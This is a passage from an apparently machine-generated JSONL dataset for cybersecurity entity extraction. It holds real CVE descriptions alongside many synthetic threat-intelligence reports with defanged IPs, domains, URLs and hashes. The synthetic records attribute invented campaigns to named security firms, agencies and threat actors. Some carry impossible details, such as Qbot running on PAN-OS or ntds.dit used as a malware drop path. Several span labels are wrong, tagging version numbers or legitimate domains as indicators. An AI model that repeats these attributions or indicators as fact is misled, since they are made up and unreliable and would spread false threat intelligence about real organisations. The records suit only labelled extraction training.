include/linux/spinlock.h:355 [inline]\n release_sock+0x1f/0x1a0 net/core/sock.c:3526\n gtp_encap_disable_sock drivers/net/gtp.c:651 [inline]\n gtp_encap_disable+0xb9/0x220 drivers/net/gtp.c:664\n gtp_dev_uninit+0x19/0x50 drivers/net/gtp.c:728\n unregister_netdevice_many_notify+0x97e/0x1520 net/core/dev.c:10841\n rtnl_delete_link net/core/rtnetlink.c:3216 [inline]\n rtnl_dellink+0x3c0/0xb30 net/core/rtnetlink.c:3268\n rtnetlink_rcv_msg+0x450/0xb10 net/core/rtnetlink.c:6423\n netlink_rcv_skb+0x15d/0x450 net/netlink/af_netlink.c:2548\n netlink_unicast_kernel net/netlink/af_netlink.c:1339 [inline]\n netlink_unicast+0x700/0x930 net/netlink/af_netlink.c:1365\n netlink_sendmsg+0x91c/0xe30 net/netlink/af_netlink.c:1913\n sock_sendmsg_nosec net/socket.c:724 [inline]\n sock_sendmsg+0x1b7/0x200 net/socket.c:747\n ____sys_sendmsg+0x75a/0x990 net/socket.c:2493\n ___sys_sendmsg+0x11d/0x1c0 net/socket.c:2547\n __sys_sendmsg+0xfe/0x1d0 net/socket.c:2576\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3f/0x90 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x72/0xdc\nRIP: 0033:0x7f1168b1fe5d\nCode: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 73 9f 1b 00 f7 d8 64 89 01 48\nRSP: 002b:00007f1167edccc8 EFLAGS: 00000246 ORIG_RAX: 000000000000002e\nRAX: ffffffffffffffda RBX: 00000000004bbf80 RCX: 00007f1168b1fe5d\nRDX: 0000000000000000 RSI: 00000000200002c0 RDI: 0000000000000003\nRBP: 00000000004bbf80 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\nR13: 000000000000000b R14: 00007f1168b80530 R15: 0000000000000000\n \n\nAllocated by task 1483:\n kasan_save_stack+0x22/0x50 mm/kasan/common.c:45\n kasan_set_track+0x25/0x30 mm/kasan/common.c:52\n __kasan_slab_alloc+0x\n---truncated---", "spans": {"Indicator: rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org": [[1286, 1338]], 
"System: Linux kernel": [[7, 19]], "System: QEMU": [[1241, 1245]], "Vulnerability: use-after-free": [[78, 92], [139, 153], [487, 501], [592, 606], [710, 724], [807, 821], [897, 911], [997, 1011]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-54142"}} {"text": "Rapid7 published a threat intelligence report linking TA505 to a new campaign exploiting CVE-2022-47837 in Juniper SRX. The attackers deployed NjRAT via Brute Ratel, establishing C2 communication with 90 [ . ] 243 [ . ] 49 [ . ] 113 and update-storage[.]top. A secondary payload was downloaded from hxxp://secure-data[ . ]io/panel/index.html. The malware binary (SHA256: c0eb0ab288ed0b91d51b08d0ab7474e899c0356942496d6f28ce73ef91841b55) was dropped to /opt/app/bin/dropper.ps1. Phishing emails were sent from contact@credential-check[.]site targeting enterprise users. A backup C2 server was identified at 82[.]34[.]153[.]12.", "spans": {"Organization: Rapid7": [[0, 6]], "Vulnerability: CVE-2022-47837": [[89, 103]], "System: Juniper SRX": [[107, 118]], "Malware: NjRAT": [[143, 148]], "Indicator: 90.243.49.113": [[201, 232]], "Indicator: update-storage.top": [[237, 257]], "Indicator: hxxp://secure-data.io/panel/index.html": [[299, 341]], "Indicator: c0eb0ab288ed0b91d51b08d0ab7474e899c0356942496d6f28ce73ef91841b55": [[371, 435]], "Indicator: contact@credential-check.site": [[509, 540]], "Indicator: 82.34.153.12": [[606, 624]]}, "info": {"id": "synth_v2_00092", "source": "defanged_augment"}} {"text": "By looking at our telemetry , we found evidence that Turla installers were exfiltrating information to get[.]adobe[.]com URLs since at least July 2016 .", "spans": {"Indicator: get.adobe.com": [[103, 120]]}, "info": {"id": "dnrti_train_001547", "source": "defanged_augment"}} {"text": "Malware Analysis Report: Qbot (MD5: 9c1d255c01f646fd037d6a8fda3fbc85). Upon execution on Palo Alto PAN-OS, the sample creates /opt/app/bin/loader.exe and injects into legitimate processes. 
Network analysis shows beaconing to 90 [ . ] 230 [ . ] 87 [ . ] 10 every 60 seconds and DNS queries to loginedge[.]cc. The second stage was fetched from hxxps://gateway-mail[ . ]top/wp-content/uploads/doc.php and written to /usr/local/bin/chrome_helper.exe. The payload uses LaZagne-style techniques for defense evasion. A secondary hash (SHA1: 0c6ca766102f724226e263d9f164c973f433501c) was extracted from the unpacked payload.", "spans": {"Malware: Qbot": [[25, 29]], "Indicator: 9c1d255c01f646fd037d6a8fda3fbc85": [[36, 68]], "System: Palo Alto PAN-OS": [[89, 105]], "Indicator: 90.230.87.10": [[225, 255]], "Indicator: loginedge.cc": [[292, 306]], "Indicator: https://gateway-mail.top/wp-content/uploads/doc.php": [[342, 397]], "Indicator: 0c6ca766102f724226e263d9f164c973f433501c": [[534, 574]]}, "info": {"id": "synth_v2_00451", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2025-19065 is a critical buffer overflow affecting Active Directory. CISA confirmed active exploitation by Turla in the wild. Exploitation delivers AgentTesla (MD5: 755cc0110a8ece9109ef36a5a0a1cfdb) which is dropped to /var/tmp/ntds.dit. The exploit payload is hosted at hxxp://edge-storage[.]net/download/update.exe and communicates to 39[.]33[.]227[.]3 for C2.", "spans": {"Vulnerability: CVE-2025-19065": [[24, 38]], "Vulnerability: buffer overflow": [[53, 68]], "System: Active Directory": [[79, 95]], "Organization: CISA": [[97, 101]], "Malware: AgentTesla": [[176, 186]], "Indicator: 755cc0110a8ece9109ef36a5a0a1cfdb": [[193, 225]], "Indicator: http://edge-storage.net/download/update.exe": [[299, 344]], "Indicator: 39.33.227.3": [[365, 382]]}, "info": {"id": "synth_v2_00743", "source": "defanged_augment"}} {"text": "Cisco Talos detected a multi-stage attack chain. The initial phishing email from noreply@phishing-domain[ . ]com contained a link to hxxp://mail-cache[.]info/callback. This redirected to hxxps://cache-update[.]dev/callback on mailcloud[.]top. 
A secondary email from admin@document-share[ . ]link pointed to hxxp://auth-api[.]tech/assets/js/payload.js which delivered NjRAT. The final payload callback was hxxps://updatestatic[ . ]site/wp-content/uploads/doc.php resolving to 9 [ . ] 59 [ . ] 190 [ . ] 51 via staticproxy[ . ]xyz.", "spans": {"Organization: Cisco Talos": [[0, 11]], "Indicator: noreply@phishing-domain.com": [[81, 112]], "Indicator: hxxp://mail-cache.info/callback": [[133, 166]], "Indicator: hxxps://cache-update.dev/callback": [[187, 222]], "Indicator: mailcloud.top": [[226, 241]], "Indicator: admin@document-share.link": [[266, 295]], "Indicator: hxxp://auth-api.tech/assets/js/payload.js": [[307, 350]], "Malware: NjRAT": [[367, 372]], "Indicator: https://updatestatic.site/wp-content/uploads/doc.php": [[405, 461]], "Indicator: 9.59.190.51": [[475, 504]], "Indicator: staticproxy.xyz": [[509, 528]]}, "info": {"id": "synth_v2_01821", "source": "defanged_augment"}} {"text": "This Windows malware loads the encrypted msctfp[.]dat file in a system folder , and loads each configuration value .", "spans": {"System: Windows": [[5, 12]], "Indicator: msctfp.dat": [[41, 53]]}, "info": {"id": "cyberner_stix_train_003748", "source": "defanged_augment"}} {"text": "FireEye published a threat intelligence report linking Star Blizzard to a new campaign exploiting CVE-2026-39735 in Ivanti Connect Secure. The attackers deployed Cobalt Strike via Metasploit, establishing C2 communication with 157[.]139[.]171[.]70 and relaydata[ . ]club. A secondary payload was downloaded from hxxp://node-storage[ . ]top/secure/token. The malware binary (SHA1: 9cb9e81bedfc446f25943dfde8fc85a1e1870f9e) was dropped to C:\\Windows\\Temp\\svchost.exe. Phishing emails were sent from info@phishing-domain[.]com targeting enterprise users. A backup C2 server was identified at 206 [ . ] 50 [ . ] 130 [ . 
] 168.", "spans": {"Organization: FireEye": [[0, 7]], "Vulnerability: CVE-2026-39735": [[98, 112]], "System: Ivanti Connect Secure": [[116, 137]], "Malware: Cobalt Strike": [[162, 175]], "Indicator: 157.139.171.70": [[227, 247]], "Indicator: relaydata.club": [[252, 270]], "Indicator: hxxp://node-storage.top/secure/token": [[312, 352]], "Indicator: 9cb9e81bedfc446f25943dfde8fc85a1e1870f9e": [[380, 420]], "Indicator: info@phishing-domain.com": [[497, 523]], "Indicator: 206.50.130.168": [[589, 621]]}, "info": {"id": "synth_v2_00217", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 52[.]3[.]73[.]115, the Tenable IR team identified BatLoader running as C:\\Windows\\Tasks\\csrss.exe. The threat actor, believed to be Forest Blizzard, used PowerView for credential harvesting and Brute Ratel for lateral movement. Exfiltrated data was sent to relayrelay[ . ]cc and api-backup[ . ]top. The initial dropper (SHA1: 0fc771507060e2d96e9cf73b4b39f48bba21660e) was delivered via a phishing email from security@identity-verify[ . ]cc. A second C2 node was observed at 172 [ . ] 126 [ . ] 168 [ . 
] 234, with a persistence mechanism writing to /home/user/.config/lsass.dmp.", "spans": {"Indicator: 52.3.73.115": [[64, 81]], "Organization: Tenable": [[87, 94]], "Malware: BatLoader": [[114, 123]], "Indicator: relayrelay.cc": [[321, 338]], "Indicator: api-backup.top": [[343, 361]], "Indicator: 0fc771507060e2d96e9cf73b4b39f48bba21660e": [[390, 430]], "Indicator: security@identity-verify.cc": [[472, 503]], "Indicator: 172.126.168.234": [[538, 571]]}, "info": {"id": "synth_v2_00312", "source": "defanged_augment"}} {"text": "The second file , happiness[.]txt , contains custom code in binary format that is encrypted and used by xxxx[.]exe .", "spans": {"Indicator: happiness.txt": [[18, 33]], "Indicator: xxxx.exe": [[104, 114]]}, "info": {"id": "cyberner_stix_train_002379", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRevert \"f2fs: fix to do sanity check on extent cache correctly\"\n\nsyzbot reports a f2fs bug as below:\n\nUBSAN: array-index-out-of-bounds in fs/f2fs/f2fs.h:3275:19\nindex 1409 is out of range for type '__le32[923]' (aka 'unsigned int[923]')\nCall Trace:\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x1e7/0x2d0 lib/dump_stack.c:106\n ubsan_epilogue lib/ubsan.c:217 [inline]\n __ubsan_handle_out_of_bounds+0x11c/0x150 lib/ubsan.c:348\n inline_data_addr fs/f2fs/f2fs.h:3275 [inline]\n __recover_inline_status fs/f2fs/inode.c:113 [inline]\n do_read_inode fs/f2fs/inode.c:480 [inline]\n f2fs_iget+0x4730/0x48b0 fs/f2fs/inode.c:604\n f2fs_fill_super+0x640e/0x80c0 fs/f2fs/super.c:4601\n mount_bdev+0x276/0x3b0 fs/super.c:1391\n legacy_get_tree+0xef/0x190 fs/fs_context.c:611\n vfs_get_tree+0x8c/0x270 fs/super.c:1519\n do_new_mount+0x28f/0xae0 fs/namespace.c:3335\n do_mount fs/namespace.c:3675 [inline]\n __do_sys_mount fs/namespace.c:3884 [inline]\n __se_sys_mount+0x2d9/0x3c0 fs/namespace.c:3861\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x41/0xc0 
arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nThe issue was bisected to:\n\ncommit d48a7b3a72f121655d95b5157c32c7d555e44c05\nAuthor: Chao Yu \nDate: Mon Jan 9 03:49:20 2023 +0000\n\n f2fs: fix to do sanity check on extent cache correctly\n\nThe root cause is we applied both v1 and v2 of the patch, v2 is the right\nfix, so it needs to revert v1 in order to fix reported issue.\n\nv1:\ncommit d48a7b3a72f1 (\"f2fs: fix to do sanity check on extent cache correctly\")\nhxxps://lore[ . ]kernel[ . ]org/lkml/20230109034920.492914-1-chao@kernel.org/\n\nv2:\ncommit 269d11948100 (\"f2fs: fix to do sanity check on extent cache correctly\")\nhxxps://lore[ . ]kernel[ . ]org/lkml/20230207134808.1827869-1-chao@kernel.org/", "spans": {"Indicator: https://lore.kernel.org/lkml/20230109034920.492914-1-chao@kernel.org/": [[1638, 1715]], "Indicator: https://lore.kernel.org/lkml/20230207134808.1827869-1-chao@kernel.org/": [[1800, 1878]], "Indicator: kernel.org": [[1303, 1317]], "Indicator: d48a7b3a72f121655d95b5157c32c7d555e44c05": [[1240, 1280]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-53763"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 131 [ . ] 250 [ . ] 188 [ . ] 179, the Europol IR team identified Hive running as C:\\Windows\\Tasks\\payload.bin. The threat actor, believed to be Velvet Tempest, used Sliver for credential harvesting and Nmap for lateral movement. Exfiltrated data was sent to data-proxy[.]com and updatelogin[.]info. The initial dropper (SHA1: c66d489e31b1c9f455df0990349890f8ccd5a4f9) was delivered via a phishing email from security@phishing-domain[.]com. A second C2 node was observed at 192 [ . ] 197 [ . ] 217 [ . 
] 189, with a persistence mechanism writing to /usr/local/bin/helper.sh.", "spans": {"Indicator: 131.250.188.179": [[64, 97]], "Organization: Europol": [[103, 110]], "Malware: Hive": [[130, 134]], "Indicator: data-proxy.com": [[323, 339]], "Indicator: updatelogin.info": [[344, 362]], "Indicator: c66d489e31b1c9f455df0990349890f8ccd5a4f9": [[391, 431]], "Indicator: security@phishing-domain.com": [[473, 503]], "Indicator: 192.197.217.189": [[538, 571]]}, "info": {"id": "synth_v2_00324", "source": "defanged_augment"}} {"text": "In this case , like others before , the event of a popular game release became an opportunity to trick unsuspecting users into downloading the RAT . The APT actor , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors . 3[ . ]doc : d4eb4035e11da04841087a181c48cd85f75c620a84832375925e6b03973d8e48 . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked “ exploitation more likely . ”", "spans": {"Organization: organizations": [[209, 222]], "Organization: financial services": [[230, 248]], "Organization: telecoms": [[251, 259]], "Organization: government": [[262, 272]], "Organization: defense sectors": [[279, 294]], "Indicator: 3.doc": [[297, 306]], "Indicator: d4eb4035e11da04841087a181c48cd85f75c620a84832375925e6b03973d8e48": [[309, 373]], "Vulnerability: CVE-2022 - 41080": [[389, 405]], "Vulnerability: CVE-2022 - 41040": [[480, 496]]}, "info": {"id": "cyberner_stix_train_005185", "source": "defanged_augment"}} {"text": "Vulnerability in the BI Publisher product of Oracle Fusion Middleware (component: E-Business Suite - XDO). Supported versions that are affected are 5 [ . ] 5 [ . ] 0 [ . ] 0.0, 11 [ . ] 1 [ . ] 1 [ . ] 9.0, 12 [ . ] 2 [ . ] 1 [ . ] 3.0 and 12[.]2[.]1[.]4.0. 
Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise BI Publisher. While the vulnerability is in BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all BI Publisher accessible data as well as unauthorized update, insert or delete access to some of BI Publisher accessible data. CVSS 3.1 Base Score 8.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N).", "spans": {"Indicator: 5.5.0.0": [[148, 173]], "Indicator: 11.1.1.9": [[177, 203]], "Indicator: 12.2.1.3": [[207, 233]], "Indicator: 12.2.1.4": [[240, 254]], "Organization: Oracle": [[45, 51]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-14880"}} {"text": "The malicious apps can steal personally identifiable and financial data and install additional apps . First attack of this campaign took place in May 2018 . The “ wprgxyeqd79[ . ]exe ” sample actually is a Self Extracting Archive ( SFX S-TOOL/SFA ) containing four files designed to be extracted in the %TEMP% folder .", "spans": {"Indicator: wprgxyeqd79.exe": [[163, 182]]}, "info": {"id": "cyberner_stix_train_001546", "source": "defanged_augment"}} {"text": "go-merkledag implements the 'DAGService' interface and adds two ipld node types, Protobuf and Raw for the ipfs project. A `ProtoNode` may be modified in such a way as to cause various encode errors which will trigger a panic on common method calls that don't allow for error returns. A `ProtoNode` should only be able to encode to valid DAG-PB, attempting to encode invalid DAG-PB forms will result in an error from the codec. Manipulation of an existing (newly created or decoded) `ProtoNode` using the modifier methods did not account for certain states that would place the `ProtoNode` into an unencodeable form. 
Due to conformance with the [`github[.]com/ipfs/go-block-format#Block`](hxxps://pkg[.]go[.]dev/github.com/ipfs/go-block-format#Block) and [`github[ . ]com/ipfs/go-ipld-format#Node`](hxxps://pkg[.]go[.]dev/github.com/ipfs/go-ipld-format#Node) interfaces, certain methods, which internally require a re-encode if state has changed, will panic due to the inability to return an error. This issue has been addressed across a number of pull requests. Users are advised to upgrade to version 0.8.1 for a complete set of fixes. Users unable to upgrade may attempt to mitigate this issue by sanitising inputs when allowing user-input to set a new `CidBuilder` on a `ProtoNode` and by sanitising `Tsize` (`Link#Size`) values such that they are a reasonable byte-size for sub-DAGs where derived from user-input.", "spans": {"Indicator: https://pkg.go.dev/github.com/ipfs/go-block-format#Block": [[688, 748]], "Indicator: https://pkg.go.dev/github.com/ipfs/go-ipld-format#Node": [[798, 856]], "Indicator: github.com": [[646, 658], [756, 770]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-23495"}} {"text": "A separate malicious executable – 2DE25306A58D8A5B6CBE8D5E2FC5F3C5 ( vlc[ . ]exe ) – runs when the photograph is displayed , using the YouTube icon and calling out to several URLs on windowsnewupdates[.]com .", "spans": {"Indicator: 2DE25306A58D8A5B6CBE8D5E2FC5F3C5": [[34, 66]], "Indicator: vlc.exe": [[69, 80]], "Indicator: windowsnewupdates.com": [[183, 206]]}, "info": {"id": "cyberner_stix_train_002917", "source": "defanged_augment"}} {"text": "Tuleap is an open source suite to improve management of software developments and collaboration. In Tuleap Community Edition prior to version 14 [ . ] 11 [ . ] 99 [ . ] 28 and Tuleap Enterprise Edition prior to versions 14.10-6 and 14.11-3, the preview of an artifact link with a type does not respect the project, tracker and artifact level permissions. The issue occurs on the artifact view (not reproducible on the artifact modal). 
Users might get access to information they should not have access to. Only the title, status, assigned to and last update date fields as defined by the semantics are impacted. If those fields have strict permissions (e.g. the title is only visible to a specific user group) those permissions are still enforced. Tuleap Community Edition 14[.]11[.]99[.]28, Tuleap Enterprise Edition 14.10-6, and Tuleap Enterprise Edition 14.11-3 contain a fix for this issue.", "spans": {"Indicator: 14.11.99.28": [[142, 171], [772, 789]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-38508"}} {"text": "SentinelOne published a threat intelligence report linking Charming Kitten to a new campaign exploiting CVE-2020-48698 in Cisco ASA. The attackers deployed REvil via Metasploit, establishing C2 communication with 198 [ . ] 24 [ . ] 24 [ . ] 170 and gateway-relay[.]site. A secondary payload was downloaded from hxxp://edge-sync[ . ]online/wp-content/uploads/doc.php. The malware binary (SHA1: 52a81f85578ec25909f93977c451790e2c34748a) was dropped to C:\\Windows\\Temp\\agent.py. Phishing emails were sent from contact@secure-verify[ . ]net targeting enterprise users. A backup C2 server was identified at 192 [ . ] 10 [ . ] 24 [ . ] 177.", "spans": {"Organization: SentinelOne": [[0, 11]], "Vulnerability: CVE-2020-48698": [[104, 118]], "System: Cisco ASA": [[122, 131]], "Malware: REvil": [[156, 161]], "Indicator: 198.24.24.170": [[213, 244]], "Indicator: gateway-relay.site": [[249, 269]], "Indicator: hxxp://edge-sync.online/wp-content/uploads/doc.php": [[311, 365]], "Indicator: 52a81f85578ec25909f93977c451790e2c34748a": [[393, 433]], "Indicator: contact@secure-verify.net": [[507, 536]], "Indicator: 192.10.24.177": [[602, 633]]}, "info": {"id": "synth_v2_00134", "source": "defanged_augment"}} {"text": "Incident Report: Gamaredon compromised the network via initial access from 213 [ . ] 199 [ . ] 124 [ . ] 120. 
The threat actor deployed BloodHound and exfiltrated data to token-auth[[.]]space. Lateral movement was observed to 196[.]212[.]188[.]152. A dropper with MD5 hash 276a463eb76edb23baa19d5eaeb35a65 was found at C:\\Windows\\System32\\config\\SAM. The exfiltration endpoint micro-update[[.]]net was registered 48 hours before the attack.", "spans": {"Indicator: 213.199.124.120": [[75, 108]], "Indicator: token-auth[.]space": [[171, 191]], "Indicator: 196.212.188.152": [[226, 247]], "Indicator: 276a463eb76edb23baa19d5eaeb35a65": [[273, 305]], "Indicator: micro-update[.]net": [[377, 397]]}, "info": {"id": "synth_00092", "source": "defanged_augment"}} {"text": "Volexity published a threat intelligence report linking Charming Kitten to a new campaign exploiting CVE-2022-25256 in Barracuda ESG. The attackers deployed Ryuk via Metasploit, establishing C2 communication with 49[.]98[.]127[.]146 and relaygateway[.]dev. A secondary payload was downloaded from hxxp://secure-secure[.]io/panel/index.html. The malware binary (MD5: 29d94d26f2667bca2cd4e0a9ec2c3a94) was dropped to C:\\Users\\admin\\Downloads\\dropper.ps1. Phishing emails were sent from report@credential-check[.]site targeting enterprise users. A backup C2 server was identified at 192[.]212[.]54[.]197.", "spans": {"Organization: Volexity": [[0, 8]], "Vulnerability: CVE-2022-25256": [[101, 115]], "System: Barracuda ESG": [[119, 132]], "Malware: Ryuk": [[157, 161]], "Indicator: 49.98.127.146": [[213, 232]], "Indicator: relaygateway.dev": [[237, 255]], "Indicator: http://secure-secure.io/panel/index.html": [[297, 339]], "Indicator: 29d94d26f2667bca2cd4e0a9ec2c3a94": [[366, 398]], "Indicator: report@credential-check.site": [[484, 514]], "Indicator: 192.212.54.197": [[580, 600]]}, "info": {"id": "synth_v2_00183", "source": "defanged_augment"}} {"text": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: WLS Core Components). 
Supported versions that are affected are 10[.]3[.]6[.]0.0 and 12 [ . ] 1 [ . ] 3 [ . ] 0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data as well as unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N).", "spans": {"Indicator: 10.3.6.0": [[155, 169]], "Indicator: 12.1.3.0": [[176, 202]], "Organization: Oracle": [[21, 27], [55, 61], [314, 320], [455, 461], [644, 650], [734, 740]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-2552"}} {"text": "IOC Bulletin - Dridex Campaign:\nNetwork Indicators:\n- 74[.]182[.]72[.]152\n- 79[.]180[.]236[.]80\n- 53[.]109[.]35[.]153\n- authauth[ . ]top\n- datadata[ . ]live\nURLs:\n- hxxp://securestatic[ . ]site/login\n- hxxp://update-cdn[.]club/admin/config\nEmail Senders:\n- finance@login-portal[ . 
]tech\n- finance@mail-service[.]info\nFile Indicators:\n- SHA256: 085dadd662b2f8760e0932d7603454ba76f42575405585325038801141c4e708\n- MD5: 73472187b07ff9f4e69561e0b907e3e0\n- Drop path: /dev/shm/csrss.exe", "spans": {"Malware: Dridex": [[15, 21]], "Indicator: 74.182.72.152": [[54, 73]], "Indicator: 79.180.236.80": [[76, 95]], "Indicator: 53.109.35.153": [[98, 117]], "Indicator: authauth.top": [[120, 136]], "Indicator: datadata.live": [[139, 156]], "Indicator: http://securestatic.site/login": [[165, 199]], "Indicator: hxxp://update-cdn.club/admin/config": [[202, 239]], "Indicator: finance@login-portal.tech": [[257, 286]], "Indicator: finance@mail-service.info": [[289, 316]], "Indicator: 085dadd662b2f8760e0932d7603454ba76f42575405585325038801141c4e708": [[344, 408]], "Indicator: 73472187b07ff9f4e69561e0b907e3e0": [[416, 448]]}, "info": {"id": "synth_v2_01337", "source": "defanged_augment"}} {"text": "Malware Analysis Report: SmokeLoader (SHA1: c08e0c725714bf8570a291a2c66071fdbc6cb980). Upon execution on MOVEit Transfer, the sample creates C:\\Users\\Public\\Documents\\taskhost.exe and injects into legitimate processes. Network analysis shows beaconing to 192[.]12[.]224[.]124 every 60 seconds and DNS queries to backup-portal[.]live. The second stage was fetched from hxxp://mail-portal[.]club/callback and written to C:\\Windows\\System32\\backdoor.elf. The payload uses Seatbelt-style techniques for defense evasion. 
A secondary hash (SHA1: 4787461f448bbb60dcee1fe14136b6391be77f79) was extracted from the unpacked payload.", "spans": {"Malware: SmokeLoader": [[25, 36]], "Indicator: c08e0c725714bf8570a291a2c66071fdbc6cb980": [[44, 84]], "System: MOVEit Transfer": [[105, 120]], "Indicator: 192.12.224.124": [[255, 275]], "Indicator: backup-portal.live": [[312, 332]], "Indicator: http://mail-portal.club/callback": [[368, 402]], "Indicator: 4787461f448bbb60dcee1fe14136b6391be77f79": [[540, 580]]}, "info": {"id": "synth_v2_00473", "source": "defanged_augment"}} {"text": "Europol detected a multi-stage attack chain. The initial phishing email from finance@credential-check[ . ]site contained a link to hxxps://proxyportal[.]link/api/v2/auth. This redirected to hxxp://backuplogin[ . ]club/api/v2/auth on cdn-login[.]top. A secondary email from billing@auth-check[ . ]org pointed to hxxps://backupstorage[ . ]xyz/portal/verify which delivered BlackCat. The final payload callback was hxxps://cachemail[ . ]tech/panel/index.html resolving to 66[.]69[.]229[.]177 via gateway-cache[ . 
]tech.", "spans": {"Organization: Europol": [[0, 7]], "Indicator: finance@credential-check.site": [[77, 110]], "Indicator: https://proxyportal.link/api/v2/auth": [[131, 169]], "Indicator: http://backuplogin.club/api/v2/auth": [[190, 229]], "Indicator: cdn-login.top": [[233, 248]], "Indicator: billing@auth-check.org": [[273, 299]], "Indicator: hxxps://backupstorage.xyz/portal/verify": [[311, 354]], "Malware: BlackCat": [[371, 379]], "Indicator: hxxps://cachemail.tech/panel/index.html": [[412, 455]], "Indicator: 66.69.229.177": [[469, 488]], "Indicator: gateway-cache.tech": [[493, 515]]}, "info": {"id": "synth_v2_01716", "source": "defanged_augment"}} {"text": "A backdoor also known as: Backdoor/W32.Optix.340187 Backdoor.Win32.Optix!O Trojan.Madtol.C Backdoor.Optix Packer.W32.NSAnti.kZ85 Backdoor/Optix.f W32/OptixPro.I Backdoor.OptixPro.13 Win32/OptixPro.F BKDR_OPTIXPRO.H Win.Trojan.Optix-5 Backdoor.Win32.Optix.b Trojan.Win32.Optix.bslhnb Backdoor.Win32.Optix_Pro.340203 Trojan.DownLoader.60627 BKDR_OPTIXPRO.H BehavesLike.Win32.Dropper.fc W32/OptixPro.WZQS-7361 Backdoor/Optix.Pro.bd BDS/Optix[.]Pro.13.7 Trojan[Backdoor]/Win32.Optix Backdoor:Win32/Optixpro.T Backdoor.Win32.Optix.b Trojan/Win32.Xema.C66170 Backdoor.Optix Bck/OptixPro.C Win32/Optix[.]Pro.13 Backdoor.Optix.Pro.BD Backdoor.Win32.Optix", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Optix.Pro": [[433, 444], [589, 600]]}, "info": {"id": "cyner2_train_005573", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: CrowdStrike identified a large-scale phishing operation. Emails originated from confirm@credential-check[ . ]site and noreply@phishing-domain[.]com, spoofing legitimate services. Victims were directed to hxxp://storageportal[.]info/assets/js/payload.js which hosted a credential harvesting page on data-storage[.]live. A secondary link hxxp://backup-update[.]tech/login delivered Play (SHA1: c49c939de808c898cb29e1c1639363cf2d0b31b4). 
The malware was saved to /dev/shm/ntds.dit and established C2 with 156[.]52[.]133[.]144.", "spans": {"Organization: CrowdStrike": [[26, 37]], "Indicator: confirm@credential-check.site": [[106, 139]], "Indicator: noreply@phishing-domain.com": [[144, 173]], "Indicator: hxxp://storageportal.info/assets/js/payload.js": [[230, 278]], "Indicator: data-storage.live": [[324, 343]], "Indicator: hxxp://backup-update.tech/login": [[362, 395]], "Malware: Play": [[406, 410]], "Indicator: c49c939de808c898cb29e1c1639363cf2d0b31b4": [[418, 458]], "Indicator: 156.52.133.144": [[528, 548]]}, "info": {"id": "synth_v2_00981", "source": "defanged_augment"}} {"text": "TensorFlow is an end-to-end open source platform for machine learning. An attacker can cause a runtime division by zero error and denial of service in `tf.raw_ops.QuantizedBatchNormWithGlobalNormalization`. This is because the implementation(hxxps://github[ . ]com/tensorflow/tensorflow/blob/6f26b3f3418201479c264f2a02000880d8df151c/tensorflow/core/kernels/quantized_add_op.cc#L289-L295) computes a modulo operation without validating that the divisor is not zero. Since `vector_num_elements` is determined based on input shapes(hxxps://github[.]com/tensorflow/tensorflow/blob/6f26b3f3418201479c264f2a02000880d8df151c/tensorflow/core/kernels/quantized_add_op.cc#L522-L544), a user can trigger scenarios where this quantity is 0. The fix will be included in TensorFlow 2.5.0. 
We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/6f26b3f3418201479c264f2a02000880d8df151c/tensorflow/core/kernels/quantized_add_op.cc#L289-L295": [[242, 386]], "Indicator: https://github.com/tensorflow/tensorflow/blob/6f26b3f3418201479c264f2a02000880d8df151c/tensorflow/core/kernels/quantized_add_op.cc#L522-L544": [[529, 671]], "Vulnerability: denial of service": [[130, 147]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-29549"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: ignore xattrs past end\n\nOnce inside 'ext4_xattr_inode_dec_ref_all' we should\nignore xattrs entries past the 'end' entry.\n\nThis fixes the following KASAN reported issue:\n\n==================================================================\nBUG: KASAN: slab-use-after-free in 